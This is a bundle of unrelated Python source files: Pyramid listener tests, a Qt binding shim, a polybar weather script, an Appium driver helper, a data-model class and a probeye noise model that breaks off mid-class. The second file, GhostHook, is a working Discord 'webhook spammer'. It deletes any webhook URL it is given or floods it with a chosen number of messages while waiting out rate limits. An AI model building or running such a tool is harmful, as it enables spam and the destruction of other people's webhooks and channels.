# File: cliquet/tests/test_listeners.py  (repo: codebyravi/cliquet, license: Apache-2.0)

# -*- coding: utf-8 -*-
import json
import uuid
from contextlib import contextmanager
from datetime import datetime

import mock
from pyramid import testing

from cliquet import initialization
from cliquet.events import ResourceChanged, ResourceRead, ACTIONS
from cliquet.listeners import ListenerBase
from cliquet.storage.redis import create_from_config
from cliquet.tests.support import unittest


class ListenerSetupTest(unittest.TestCase):
    def setUp(self):
        redis_patch = mock.patch('cliquet.listeners.redis.load_from_config')
        self.addCleanup(redis_patch.stop)
        self.redis_mocked = redis_patch.start()

    def make_app(self, extra_settings={}):
        settings = {
            'event_listeners': 'cliquet.listeners.redis',
        }
        settings.update(**extra_settings)
        config = testing.setUp(settings=settings)
        config.commit()
        initialization.setup_listeners(config)
        return config

    def test_listener_module_is_specified_via_settings(self):
        self.make_app({
            'event_listeners': 'redis',
            'event_listeners.redis.use': 'cliquet.listeners.redis',
        })
        self.assertTrue(self.redis_mocked.called)

    def test_listener_module_can_be_specified_via_listeners_list(self):
        self.make_app()
        self.assertTrue(self.redis_mocked.called)

    def test_callback_called_when_action_is_not_filtered(self):
        config = self.make_app()
        event = ResourceChanged(ACTIONS.CREATE, 123456, [], Request())
        config.registry.notify(event)
        self.assertTrue(self.redis_mocked.return_value.called)

    def test_callback_is_not_called_when_action_is_filtered(self):
        config = self.make_app({
            'event_listeners.redis.actions': 'delete',
        })
        event = ResourceChanged(ACTIONS.CREATE, 123456, [], Request())
        config.registry.notify(event)
        self.assertFalse(self.redis_mocked.return_value.called)

    def test_callback_called_when_resource_is_not_filtered(self):
        config = self.make_app()
        event = ResourceChanged(ACTIONS.CREATE, 123456, [], Request())
        event.payload['resource_name'] = 'mushroom'
        config.registry.notify(event)
        self.assertTrue(self.redis_mocked.return_value.called)

    def test_callback_is_not_called_when_resource_is_filtered(self):
        config = self.make_app({
            'event_listeners.redis.resources': 'toad',
        })
        event = ResourceChanged(ACTIONS.CREATE, 123456, [], Request())
        event.payload['resource_name'] = 'mushroom'
        config.registry.notify(event)
        self.assertFalse(self.redis_mocked.return_value.called)

    def test_callback_is_not_called_on_read_by_default(self):
        config = self.make_app()
        event = ResourceRead(ACTIONS.READ, 123456, [], Request())
        config.registry.notify(event)
        self.assertFalse(self.redis_mocked.return_value.called)

    def test_callback_is_called_on_read_if_specified(self):
        config = self.make_app({
            'event_listeners.redis.actions': 'read',
        })
        event = ResourceRead(ACTIONS.READ, 123456, [], Request())
        config.registry.notify(event)
        self.assertTrue(self.redis_mocked.return_value.called)

    def test_same_callback_is_called_for_read_and_write_specified(self):
        config = self.make_app({
            'event_listeners.redis.actions': 'read create delete',
        })
        event = ResourceRead(ACTIONS.READ, 123456, [], Request())
        config.registry.notify(event)
        event = ResourceChanged(ACTIONS.CREATE, 123456, [], Request())
        config.registry.notify(event)
        self.assertEqual(self.redis_mocked.return_value.call_count, 2)


@contextmanager
def broken_redis():
    from redis import StrictRedis
    old = StrictRedis.lpush

    def push(*args, **kwargs):
        raise Exception('boom')

    StrictRedis.lpush = push
    yield
    StrictRedis.lpush = old


UID = str(uuid.uuid4())


class Resource(object):
    record_id = UID
    timestamp = 123456789


class ViewSet(object):
    def get_name(*args, **kw):
        return 'collection'


class Service(object):
    viewset = ViewSet()


class Match(object):
    cornice_services = {'watev': Service()}
    pattern = 'watev'


class Request(object):
    path = '/1/bucket/collection/'
    prefixed_userid = 'tarek'
    matchdict = {'id': UID}
    registry = matched_route = Match()
    current_resource_name = 'bucket'


class ListenerCalledTest(unittest.TestCase):
    def setUp(self):
        self.config = testing.setUp()
        self.config.add_settings({'events_pool_size': 1,
                                  'events_url': 'redis://localhost:6379/0'})
        self._redis = create_from_config(self.config, prefix='events_')
        self._size = 0

    def _save_redis(self):
        self._size = self._redis.llen('cliquet.events')

    def has_redis_changed(self):
        return self._redis.llen('cliquet.events') > self._size

    def notify(self, event):
        self._save_redis()
        self.config.registry.notify(event)

    @contextmanager
    def redis_listening(self):
        config = self.config
        listener = 'cliquet.listeners.redis'

        # setting up the redis listener
        with mock.patch.dict(config.registry.settings,
                             [('event_listeners', listener),
                              ('event_listeners.redis.pool_size', '1')]):
            initialization.setup_listeners(config)
            config.commit()
            yield

    def test_redis_is_notified(self):
        with self.redis_listening():
            # let's trigger an event
            event = ResourceChanged(ACTIONS.CREATE, 123456, [], Request())
            self.notify(event)
            self.assertTrue(self.has_redis_changed())

            # okay, we should have the first event in Redis
            last = self._redis.lpop('cliquet.events')
            last = json.loads(last.decode('utf8'))
            self.assertEqual(last['action'], ACTIONS.CREATE.value)

    def test_notification_is_broken(self):
        with self.redis_listening():
            # an event with bad JSON should silently break and send nothing
            # (datetime objects cannot be dumped)
            event2 = ResourceChanged(ACTIONS.CREATE,
                                     datetime.now(),
                                     [],
                                     Request())
            self.notify(event2)
            self.assertFalse(self.has_redis_changed())

    def test_redis_is_broken(self):
        with self.redis_listening():
            # if the redis call fails, same deal: we should ignore it
            self._save_redis()
            with broken_redis():
                event = ResourceChanged(ACTIONS.CREATE, 123456, [], Request())
                self.config.registry.notify(event)
            self.assertFalse(self.has_redis_changed())


class ListenerBaseTest(unittest.TestCase):
    def test_not_implemented(self):
        # make sure we can't use the base listener
        listener = ListenerBase()
        self.assertRaises(NotImplementedError, listener, object())
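
# The base-class test above only proves that ListenerBase cannot be used
# directly. For illustration, a minimal concrete listener could look like the
# hypothetical sketch below; the __call__(event) signature is inferred from
# the tests (listener instances are invoked as callables with the event), not
# taken from cliquet itself.
class PrintListener(ListenerBase):
    def __call__(self, event):
        # the filter tests above suggest events carry a .payload dict
        print('event received:', getattr(event, 'payload', None))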

# File: GhostHooksrc.py  (repo: UiIsBack/GhostHook, license: Apache-2.0)
import os
os.system('cls & mode 85,20 & title GhostHook! - Version 1.4!')

import time
import requests
from colorama import Fore
from pystyle import *


def main():
    image = """
,%@&(
@@@@@@@@@@@@@%
.@@@@@@@@@@@@@@@@@(
@@@@@@@@@@@@@@@@@@@#
(@@@@@& @@@@ @@@@@@.
@@@@& @@@* @@@@@( @@@@@@@@
, / ,@@@. *@@@@@* @@@@@& @@@@@ @@/ @&
@@@@@@@@@ /@@@@@@@@@@@@@@@@@@@@ &@& @* @@ #%
@@ @@.&@@(@@@@ (@@@@@@# ,.@@@@@@@@@ &@@( % @
@ ,@/ @* &@@@@@@@@@@@, @@@@% ((@@@@@@@@@@@@ /&
#( &@# &@@@@@@@@@@@&@@@@@@@@# @@@@@@@@@@,
&@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@
&@@@@@@@@@@@@@@@@@@@@@#&@@@@@@@@@@@
&. /@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ /@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,/
, #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ //
, (,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ @ @@@@@@@@@@@@@@@@@@@@@@@@@%
,(# * *@#@@@@@@@@@@@@@@@@@@ & @
@%@@@@@@@@@@@@@@@@@/ ..
@@@@@@@@@@@@@@@@@@#
*.@@@@@@@@@@@@@@@&,
#%@@/ @@@@@@@@ @
%.*@ *@@@@@@@ (
( @ @@@@@@
@ &@@@@@
@ @@@.@
#@*
/@*
&@
"""
    Anime.Fade(Center.Center(image), Colors.purple_to_blue, Colorate.Vertical, interval=0.025, enter=True)
    print(Colorate.Horizontal(Colors.purple_to_blue, Center.XCenter(image)))

    name = """
d888b db db .d88b. .d8888. d888888b db db .d88b. .d88b. db dD
88' Y8b 88 88 .8P Y8. 88' YP `~~88~~' 88 88 .8P Y8. .8P Y8. 88 ,8P'
88 88ooo88 88 88 `8bo. 88 88ooo88 88 88 88 88 88,8P
88 ooo 88~~~88 88 88 `Y8b. 88 88~~~88 88 88 88 88 88`8b
88. ~8~ 88 88 `8b d8' db 8D 88 88 88 `8b d8' `8b d8' 88 `88.
Y888P YP YP `Y88P' `8888Y' YP YP YP `Y88P' `Y88P' YP YD
https://ghostt.ga Version 1.4
─═══════════════════════════════════☆☆═══════════════════════════════════─
loading ghosthook || webhook spammer
─═══════════════════════════════════☆☆═══════════════════════════════════─
"""
    Anime.Fade(Center.Center(name), Colors.purple_to_blue, Colorate.Vertical, interval=0.025, enter=True)
    print(Colorate.Horizontal(Colors.purple_to_blue, Center.XCenter(name)))

    webhook_url = Write.Input("webhook>", Colors.purple_to_blue, interval=0.008)
    r = requests.get(webhook_url)
    if r.status_code == 200:
        print(f"{Fore.GREEN}Webhook working{Fore.RESET}")
        time.sleep(1)
    else:
        print(f"{Fore.RED}[404] Webhook Invalid{Fore.RESET}")
        exit()

    Write.Print('1. Webhook Deleter 2. Webhook Spammer\n', Colors.purple, interval=0)

    def deelhook():
        # deletes the webhook
        result = requests.request(method="DELETE", url=webhook_url)
        try:
            result.raise_for_status()
        except requests.exceptions.HTTPError as err:
            print(f"{Fore.RED}[{Fore.GREEN}!{Fore.RED}]{Fore.GREEN} " + str(err))
        else:
            Write.Print(f" Webhook successfully deleted\n [{result.status_code}]", Colors.red, interval=0)
            time.sleep(3)

    def hooks():
        msg = Write.Input("message-> ", Colors.purple_to_blue, interval=0.008)
        namehook = Write.Input("webhook name-> ", Colors.blue_to_purple, interval=0.008)
        theard = int(Write.Input("amount of messages-> ", Colors.blue_to_cyan))
        discordavurl = Write.Input("Enter Avatar Url leave blank for default [>]", Colors.cyan_to_blue, interval=0.008)
        footer = Write.Input("Embed Footer [>]", Colors.cyan_to_blue, interval=0.008)
        maincon = Write.Input("embed content [>]", Colors.cyan_to_blue, interval=0.008)
        embedauth = Write.Input("embed author [>]", Colors.cyan_to_blue, interval=0.008)
        Write.Print('spam starting...\n', Colors.green, interval=0)
        time.sleep(2)

        embeds = []
        embed = {
            "color": 12208895,
            "fields": [
                {
                    "name": "**Nice Webhook**",
                    "value": f'{maincon}',
                    "inline": True
                },
            ],
            "author": {
                "name": f"{embedauth}",
                "icon_url": discordavurl
            },
            "footer": {
                "text": f"{footer}"
            }
        }
        embeds.append(embed)

        # setting up defaults
        os.system('cls')
        defaulthookname = 'ui!'
        defaultmessage = 'c '
        defaultav = 'https://www.kindpng.com/picc/m/103-1038268_not-scary-cartoon-ghost-hd-png-download.png'
        if discordavurl == '':
            discordavurl = defaultav
        print(" ")
        hookname = namehook
        data = {
            "content": msg,
            "embeds": embeds,
            "username": namehook,
            "avatar_url": discordavurl
        }
        webhook = webhook_url
        for x in range(theard):
            response = requests.post(url=webhook, json=data)
            try:
                if response.status_code == 204 or response.status_code == 200:
                    Write.Print("Message sent\n", Colors.green_to_cyan, interval=0)
                elif response.status_code == 429:
                    Write.Print(f"Rate limited ({response.json()['retry_after']}ms)\n", Colors.red_to_yellow, interval=0)
                    time.sleep(response.json()["retry_after"] / 1000)
                elif response.status_code == 404:
                    Write.Print("Webhook Deleted\n", Colors.red_to_black, interval=0)
                    time.sleep(3)
                    break
                else:
                    Write.Print(f"Error : {response.status_code}!\n", Colors.red_to_green, interval=0)
                    time.sleep(.01)
                    break
            except KeyboardInterrupt:
                break
        Write.Print("Spam Ended", Colors.blue, interval=0.08)
        time.sleep(0.75)
        print(" ")
        print(" ")
        os.system('cls')

        hookname = namehook
        if hookname == '':
            hookname = defaulthookname
            print(" ")
            print(f'you entered nothing, name set to {defaulthookname}')
            print(" ")
        message = msg
        if message == '':
            message = defaultmessage
            print(" ")
            print(f'you entered nothing, msg set to {defaultmessage}')
        try:
            print(" ")
            threads = theard
            if threads < 1:
                print(" ")
                print("you didn't set any threads, threads set to 1")
                threads = 1
        except ValueError:
            threads = 1
            print(" ")
            print('Invalid threads / Setting to 1.')
        print(" ")

    gh = input(f"{Fore.RED}[+]{Fore.RESET}{Fore.MAGENTA}")
    if gh == '1':
        deelhook()
        main()
    elif gh == '2':
        hooks()
        main()
    else:
        Write.Print(f"enter either 1 or 2! not {gh}", Colors.red, interval=0)
        time.sleep(3)
        main()


main()

# File: pyblish_starter/vendor/Qt.py  (repo: pyblish/pyblish-starter, license: MIT)

"""Map all bindings to PySide2
This module replaces itself with the most desirable binding.

Project goals:
    Qt.py was born in the film and visual effects industry to address
    the growing need for the development of software capable of running
    with more than one flavour of the Qt bindings for Python - PySide,
    PySide2, PyQt4 and PyQt5.

    1. Build for one, run with all
    2. Explicit is better than implicit
    3. Support co-existence

Default resolution order:
    - PySide2
    - PyQt5
    - PySide
    - PyQt4

Usage:
    >>> import sys
    >>> from Qt import QtWidgets
    >>> app = QtWidgets.QApplication(sys.argv)
    >>> button = QtWidgets.QPushButton("Hello World")
    >>> button.show()
    >>> app.exec_()

"""

import os
import sys

__version__ = "0.4.3"

# All unique members of Qt.py
__added__ = list()

# Members copied from elsewhere, such as QtGui -> QtWidgets
__remapped__ = list()

# Existing members modified in some way
__modified__ = list()


def remap(object, name, value, safe=True):
    """Prevent accidental assignment of existing members

    Arguments:
        object (object): Parent of new attribute
        name (str): Name of new attribute
        value (object): Value of new attribute
        safe (bool): Whether or not to guarantee that
            the new attribute was not overwritten.
            Can be set to False under condition that
            it is superseded by extensive testing.

    """

    if os.getenv("QT_TESTING") is not None and safe:
        # Cannot alter original binding.
        if hasattr(object, name):
            raise AttributeError("Cannot override existing name: "
                                 "%s.%s" % (object.__name__, name))

        # Cannot alter classes of functions
        if type(object).__name__ != "module":
            raise AttributeError("%s != 'module': Cannot alter "
                                 "anything but modules" % object)

    elif hasattr(object, name):
        # Keep track of modifications
        __modified__.append(name)

    if name not in __added__:
        __remapped__.append(name)

    setattr(object, name, value)


def add(object, name, value, safe=True):
    """Identical to :func:`remap` and provided for readability only"""
    __added__.append(name)
    remap(object, name, value, safe)


def pyqt5():
    import PyQt5.Qt
    from PyQt5 import QtCore, uic

    remap(QtCore, "Signal", QtCore.pyqtSignal)
    remap(QtCore, "Slot", QtCore.pyqtSlot)
    remap(QtCore, "Property", QtCore.pyqtProperty)

    add(PyQt5, "__wrapper_version__", __version__)
    add(PyQt5, "__binding__", "PyQt5")
    add(PyQt5, "__binding_version__", QtCore.PYQT_VERSION_STR)
    add(PyQt5, "__qt_version__", QtCore.QT_VERSION_STR, safe=False)
    add(PyQt5, "__added__", __added__)
    add(PyQt5, "__remapped__", __remapped__)
    add(PyQt5, "__modified__", __modified__)
    add(PyQt5, "load_ui", lambda fname: uic.loadUi(fname))

    return PyQt5


def pyqt4():
    # Attempt to set sip API v2 (must be done prior to importing PyQt4)
    import sip
    try:
        sip.setapi("QString", 2)
        sip.setapi("QVariant", 2)
        sip.setapi("QDate", 2)
        sip.setapi("QDateTime", 2)
        sip.setapi("QTextStream", 2)
        sip.setapi("QTime", 2)
        sip.setapi("QUrl", 2)
    except AttributeError:
        raise ImportError
    # PyQt4 < v4.6
    except ValueError:
        # API version already set to v1
        raise ImportError

    import PyQt4.Qt
    from PyQt4 import QtCore, QtGui, uic

    remap(PyQt4, "QtWidgets", QtGui)
    remap(QtCore, "Signal", QtCore.pyqtSignal)
    remap(QtCore, "Slot", QtCore.pyqtSlot)
    remap(QtCore, "Property", QtCore.pyqtProperty)
    remap(QtCore, "QItemSelection", QtGui.QItemSelection)
    remap(QtCore, "QStringListModel", QtGui.QStringListModel)
    remap(QtCore, "QItemSelectionModel", QtGui.QItemSelectionModel)
    remap(QtCore, "QSortFilterProxyModel", QtGui.QSortFilterProxyModel)
    remap(QtCore, "QAbstractProxyModel", QtGui.QAbstractProxyModel)

    try:
        from PyQt4 import QtWebKit
        remap(PyQt4, "QtWebKitWidgets", QtWebKit)
    except ImportError:
        # QtWebKit is optional in Qt, therefore it might not be available
        pass

    add(PyQt4, "__wrapper_version__", __version__)
    add(PyQt4, "__binding__", "PyQt4")
    add(PyQt4, "__binding_version__", QtCore.PYQT_VERSION_STR)
    add(PyQt4, "__qt_version__", QtCore.QT_VERSION_STR)
    add(PyQt4, "__added__", __added__)
    add(PyQt4, "__remapped__", __remapped__)
    add(PyQt4, "__modified__", __modified__)
    add(PyQt4, "load_ui", lambda fname: uic.loadUi(fname))

    return PyQt4


def pyside2():
    import PySide2
    from PySide2 import QtGui, QtCore, QtUiTools

    remap(QtCore, "QStringListModel", QtGui.QStringListModel)

    add(PySide2, "__wrapper_version__", __version__)
    add(PySide2, "__binding__", "PySide2")
    add(PySide2, "__binding_version__", PySide2.__version__)
    add(PySide2, "__qt_version__", PySide2.QtCore.qVersion())
    add(PySide2, "__added__", __added__)
    add(PySide2, "__remapped__", __remapped__)
    add(PySide2, "__modified__", __modified__)
    add(PySide2, "load_ui", lambda fname: QtUiTools.QUiLoader().load(fname))

    return PySide2


def pyside():
    import PySide
    from PySide import QtGui, QtCore, QtUiTools

    remap(PySide, "QtWidgets", QtGui)
    remap(QtCore, "QSortFilterProxyModel", QtGui.QSortFilterProxyModel)
    remap(QtCore, "QStringListModel", QtGui.QStringListModel)
    remap(QtCore, "QItemSelection", QtGui.QItemSelection)
    remap(QtCore, "QItemSelectionModel", QtGui.QItemSelectionModel)
    remap(QtCore, "QAbstractProxyModel", QtGui.QAbstractProxyModel)

    try:
        from PySide import QtWebKit
        remap(PySide, "QtWebKitWidgets", QtWebKit)
    except ImportError:
        # QtWebKit is optional in Qt, therefore it might not be available
        pass

    add(PySide, "__wrapper_version__", __version__)
    add(PySide, "__binding__", "PySide")
    add(PySide, "__binding_version__", PySide.__version__)
    add(PySide, "__qt_version__", PySide.QtCore.qVersion())
    add(PySide, "__added__", __added__)
    add(PySide, "__remapped__", __remapped__)
    add(PySide, "__modified__", __modified__)
    add(PySide, "load_ui", lambda fname: QtUiTools.QUiLoader().load(fname))

    return PySide


def log(text, verbose):
    if verbose:
        sys.stdout.write(text)


def init():
    """Try loading each binding in turn

    Please note: the entire Qt module is replaced with this code:
        sys.modules["Qt"] = binding()

    This means no functions or variables can be called after
    this has executed.

    """

    preferred = os.getenv("QT_PREFERRED_BINDING")
    verbose = os.getenv("QT_VERBOSE") is not None
    bindings = (pyside2, pyqt5, pyside, pyqt4)

    if preferred:

        # Internal flag (used in installer)
        if preferred == "None":
            sys.modules[__name__].__wrapper_version__ = __version__
            return

        preferred = preferred.split(os.pathsep)
        available = {
            "PySide2": pyside2,
            "PyQt5": pyqt5,
            "PySide": pyside,
            "PyQt4": pyqt4
        }

        try:
            bindings = [available[binding] for binding in preferred]
        except KeyError:
            raise ImportError(
                "Available preferred Qt bindings: "
                + "\n".join(preferred)
            )

    for binding in bindings:
        log("Trying %s" % binding.__name__, verbose)

        try:
            binding = binding()

        except ImportError as e:
            log(" - ImportError(\"%s\")\n" % e, verbose)
            continue

        else:
            # Reference to this module
            binding.__shim__ = sys.modules[__name__]

            sys.modules.update({
                __name__: binding,

                # Fix #133, `from Qt.QtWidgets import QPushButton`
                __name__ + ".QtWidgets": binding.QtWidgets
            })

            return

    # If no binding was found, raise this error
    raise ImportError("No Qt binding was found.")


init()
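
# Usage sketch (not part of Qt.py): because init() swaps this module out of
# sys.modules at import time, the binding choice can be steered entirely
# through the environment variables read above. This assumes at least one
# binding is actually installed.
#
#     import os
#     os.environ["QT_PREFERRED_BINDING"] = os.pathsep.join(["PySide2", "PyQt5"])
#     os.environ["QT_VERBOSE"] = "1"   # log each binding attempt to stdout
#
#     import Qt
#     print(Qt.__binding__)            # e.g. "PySide2", whichever imported first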

# File: .config/polybar/scripts/weather/weather.py  (repo: XECortex/dots, license: MIT)

#!/usr/bin/env python
import os
import requests

path = os.path.dirname(os.path.realpath(__file__))

if not os.path.isfile(f"{path}/config.py"):
    print(f"⚠ No weather config found. Check out \"{path}/config.py\"")
    exit()
else:
    from config import *

url = f"https://api.openweathermap.org/data/2.5/weather?id={city}&appid={key}&units={units}&lang={lang}"
res = requests.get(url)
icon = icons.get(res.json().get('weather')[0]['icon'], "")
temp = round(res.json().get('main')['temp'], 1)

if res.json().get('weather')[0]['icon'].endswith('n'):
    icon_color = color_night
else:
    icon_color = color_day

print(f"%{{F{icon_color}}}" + icon + "%{F-}", temp, symbol)

# File: util/driver.py  (repo: youran1024/AutoTest, license: MIT)

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from appium import webdriver

server_base = "http://127.0.0.1:"
server_end = "/wd/hub"

capabilities = {
    "platformName": "iOS",
    "automationName": "XCUITest",
    "platformVersion": "11.0",
    "app": "/Users/hunter/Desktop/python/PythonAppium2/app/iOSFinancial.app",
    "deviceName": "iPhone 8",
    "noReset": "true"
}

capabilities_real = {
    "udid": "5d00e43272746fd85c456ddcbe52593b64d7f132",
    "app": "/Users/hunter/Desktop/iOSFinancial-r.app",
    "platformName": "iOS",
    "deviceName": "iPhone",
    "automationName": "XCUITest",
    "platformVersion": "11.4"
}


class Driver:
    def start_driver(self, port):
        server = server_base + str(port) + server_end
        try:
            print(server, capabilities_real)
            driver = webdriver.Remote(server, capabilities_real)
            return driver
        except Exception as e:
            print('driver start error:', e)
            return None


if __name__ == '__main__':
    driver = Driver()
    driver.start_driver(4723)

# File: objectModel/Python/cdm/resolvedmodel/expression_parser/input_values.py
# (repo: rt112000/CDM, licenses: CC-BY-4.0, MIT)

# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.

from typing import Optional, TYPE_CHECKING

if TYPE_CHECKING:
    from cdm.resolvedmodel.projections.projection_directive import ProjectionDirective


class InputValues:
    """A structure to carry all the input values during evaluation/resolution of an expression tree"""

    def __init__(self, proj_directive: 'ProjectionDirective'):
        if not proj_directive:
            return

        self.no_max_depth = proj_directive._has_no_maximum_depth  # type: Optional[bool]
        self.is_array = proj_directive._is_array  # type: Optional[bool]
        self.reference_only = proj_directive._is_reference_only  # type: Optional[bool]
        self.normalized = proj_directive._is_normalized  # type: Optional[bool]
        self.structured = proj_directive._is_structured  # type: Optional[bool]
        self.is_virtual = proj_directive._is_virtual  # type: Optional[bool]
        self.next_depth = proj_directive._res_opt._depth_info.current_depth  # type: Optional[int]
        self.max_depth = proj_directive._maximum_depth  # type: Optional[int]
        self.min_cardinality = proj_directive._cardinality._minimum_number if proj_directive._cardinality else None  # type: Optional[int]
        self.max_cardinality = proj_directive._cardinality._maximum_number if proj_directive._cardinality else None  # type: Optional[int]

# File: probeye/definition/noise_model.py  (repo: BAMresearch/probeye, license: MIT)

# standard library
from typing import Union, List, Optional

# third party imports
import numpy as np

# local imports
from probeye.definition.sensor import Sensor
from probeye.subroutines import make_list, translate_prms_def


class NoiseModelBase:
    def __init__(
        self,
        dist: str,
        prms_def: Union[str, List[Union[str, dict]], dict],
        sensors: Union[Sensor, List[Sensor]],
        name: Optional[str] = None,
        corr: Optional[str] = None,
        corr_model: Optional[str] = None,
        noise_type: str = "additive",
    ):
        """
        Parameters
        ----------
        dist
            A string specifying the probability distribution the noise model is based
            on, e.g. 'normal'.
        prms_def
            A list of parameter names (strings) defining how a noise parameter vector
            given to the loglike_contribution method is interpreted. For example:
            prms_def = ['mu', 'sigma'] means that the noise parameter vector has two
            elements, the first of which gives the value of 'mu' and the second gives
            the value of 'sigma'.
        sensors
            Sensor objects that are required to evaluate the noise model.
        name
            Unique name of the noise model. This name is None if the user does not
            specify it when adding the noise model to the problem. It is then named
            automatically before starting the inference engine.
        corr
            Defines the correlation model. So far this is just a placeholder. It is not
            clear yet how exactly the correlation should be defined. When it is set to
            None, all sensors/sensor elements are independent.
        corr_model
            Defines the correlation function to be used in case corr isn't None.
        noise_type
            Either 'additive', 'multiplicative' or 'other'. Defines if the error is
            computed via [prediction - measurement] ('additive') or via [prediction /
            measurement - 1] ('multiplicative') or in some 'other', i.e.,
            non-standard fashion.
        """
        self.dist = dist
        self.prms_def, self.prms_dim = translate_prms_def(prms_def)
        self.sensors = make_list(sensors)
        self.sensor_names = [sensor.name for sensor in self.sensors]
        self.name = name
        self.corr = corr
        self.corr_model = corr_model
        self.noise_type = noise_type

        # this is a list of experiment names that relate to the noise model; the list
        # will be filled after experiments have been added to the InferenceProblem and
        # the problem definition is complete; in this case call InferenceProblem.
        # assign_experiments_to_noise_models() to fill it with the corresponding names
        self.experiment_names = []  # type: List[str]

        # as soon as defined, this attribute will be a pointer to the inference
        # problem's experiments (it will be used for consistency checks)
        self.problem_experiments = {}  # type: dict

        # set the error_function depending on the noise-type
        if noise_type == "additive":
            self.error_function = self.error_function_additive
        elif noise_type == "multiplicative":
            self.error_function = self.error_function_multiplicative
        elif noise_type == "other":
            self.error_function = self.error_function_other
        else:
            raise ValueError(
                f"Encountered unknown noise_type: '{noise_type}'. The noise_type must "
                f"be either 'additive', 'multiplicative' or 'other'."
            )

    def add_experiments(self, experiment_names_: Union[str, List[str]]):
        """
        Adds experiment names to the noise model. When the noise model is evaluated it
        will only be evaluated for those experiments added here.

        Parameters
        ----------
        experiment_names_
            Names (strings) of experiments from the InferenceProblem that should be
            added to the noise model.
        """
        # check if the given experiments are compatible with the noise model with
        # respect to the sensors
        experiment_names = make_list(experiment_names_)
        forward_models = set()
        for exp_name in experiment_names:
            exp_dict = self.problem_experiments[exp_name]
            forward_models.add(exp_dict["forward_model"])
            sensor_names_exp = [*exp_dict["sensor_values"].keys()]
            for sensor_name in self.sensor_names:
                if sensor_name not in sensor_names_exp:
                    raise RuntimeError(
                        f"Experiment '{exp_name}' does not contain a sensor "
                        f"'{sensor_name}' which is required for the evaluation of the "
                        f"noise model."
                    )
        # check if the given experiments all refer to one forward model
        if len(forward_models) > 1:
            raise RuntimeError(
                f"The given experiments refer to more than one forward model!"
            )
        # check if one of the given experiments has been added before
        for exp_name in experiment_names:
            if exp_name in self.experiment_names:
                raise RuntimeError(
                    f"The experiment '{exp_name}' has already been added to this noise "
                    f"model. Something might be wrong here."
                )
        self.experiment_names += experiment_names

    def error(self, model_response_dict: dict) -> dict:
        """
        Computes the model error for all of the noise model's experiments and returns
        them in a dictionary that is sorted by output sensor_values.

        Parameters
        ----------
        model_response_dict
            The first key is the name of the experiment. The values are dicts which
            contain the forward model's output sensors' names as keys and have the
            corresponding model responses as values.

        Returns
        -------
        model_error_dict
            A dictionary with the keys being the noise model's sensor names, and 1D
            numpy arrays representing the model errors as values.
        """
        # prepare the dictionary keys
        model_error_dict = {name: np.array([]) for name in self.sensor_names}

        # fill the dictionary with model error vectors
        for exp_name in self.experiment_names:
            exp_dict = self.problem_experiments[exp_name]
            ym_dict = model_response_dict[exp_name]
            ye_dict = exp_dict["sensor_values"]
            me_dict = self.error_function(ym_dict, ye_dict)
            model_error_dict = {
                name: np.append(model_error_dict[name], me_dict[name])
                for name in self.sensor_names
            }
        return model_error_dict

    def error_function_additive(self, ym_dict: dict, ye_dict: dict) -> dict:
        """
        Evaluates the additive model error for each of the noise model's sensors.

        Parameters
        ----------
        ym_dict
            The computed values for the model's output sensor_values.
        ye_dict
            The measured values for the model's output sensor_values.

        Returns
        -------
        error_dict
            The computed model error for the model's output sensor_values.
        """
        # for each sensor, its own error metric is used to compute the error
        error_dict = {name: ym_dict[name] - ye_dict[name] for name in self.sensor_names}
        return error_dict

    def error_function_multiplicative(self, ym_dict: dict, ye_dict: dict) -> dict:
        """
        Evaluates the multiplicative model error for each of the noise model's sensors.

        Parameters
        ----------
        ym_dict
            The computed values for the model's output sensor_values.
        ye_dict
            The measured values for the model's output sensor_values.

        Returns
        -------
        error_dict
            The computed model error for the model's output sensor_values.
        """
        # for each sensor, its own error metric is used to compute the error
        error_dict = {
            name: ym_dict[name] / ye_dict[name] - 1.0 for name in self.sensor_names
        }
        return error_dict

    def error_function_other(self, ym_dict: dict, ye_dict: dict) -> dict:
        """
        Non-standard error function self.error_function will point to when self.
        noise_type is set to 'other'. See self.error_function for more information.
        """
        raise NotImplementedError(
            "Your model does not have a non-standard error_function method yet. If "
            "you want to use it, you need to implement it first."
        )

    def loglike_contribution(
        self, model_response_dict: dict, prms: dict, worst_value: float = -np.infty
    ) -> float:
        """
        Evaluates the log-likelihood function for the given model error and the given
        noise parameter vector. This method has to be overwritten.

        Parameters
        ----------
        model_response_dict
            The first key is the name of the experiment. The values are dicts which
            contain the forward model's output sensors' names as keys and have the
            corresponding model responses as values.
        prms
            Dictionary containing parameter name:value pairs.
        worst_value
            This value is returned when this method does not result in a numeric value.
            This might happen, for example, when the given parameters are not valid
            (for example in case of a negative standard deviation). The returned value
            in such cases should represent the worst possible value of the
            contribution.

        Returns
        -------
        ll
            The evaluated log-likelihood function.
        """
        raise NotImplementedError(
            "Your model does not have a loglike_contribution method. You need to "
            "define this method so you can evaluate your noise model."
        )


class NormalNoiseModel(NoiseModelBase):
    """
    A general Gaussian (normal) noise model with or without correlations.
    """

    def __init__(
        self,
        prms_def: Union[str, List[Union[str, dict]], dict],
        sensors: Union[Sensor, List[Sensor]],
        name: Optional[str] = None,
        corr: Optional[str] = None,
        corr_model: Optional[str] = None,
        noise_type: str = "additive",
    ):
        """
        See docstring of NoiseModelBase for information on the input arguments.
        """
        # initialize the base class with given input
        super().__init__(
            "normal",
            prms_def,
            sensors,
            name=name,
            corr=corr,
            corr_model=corr_model,
            noise_type=noise_type,
        )

        # check that the standard deviation is provided (this can be either as a
        # constant or a latent parameter, but it has to be given)
        if "std" not in [*self.prms_def.values()]:
            raise RuntimeError(
                "The standard deviation 'std' was not provided in prms_def!"
            )

        # the mean value(s) do not have to be stated explicitly; if they are not
        # given, they are assumed to be zero
        self.zero_mean = True
        if "mean" in [*self.prms_def.values()]:
            self.zero_mean = False
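
# loglike_contribution deliberately raises NotImplementedError above, so
# concrete models must supply it. The hypothetical subclass below sketches
# what an uncorrelated Gaussian implementation could look like; it assumes the
# 'std'/'mean' parameter names and the error() convention used above, and is
# illustrative rather than probeye's actual implementation.
class IndependentNormalNoiseModel(NormalNoiseModel):
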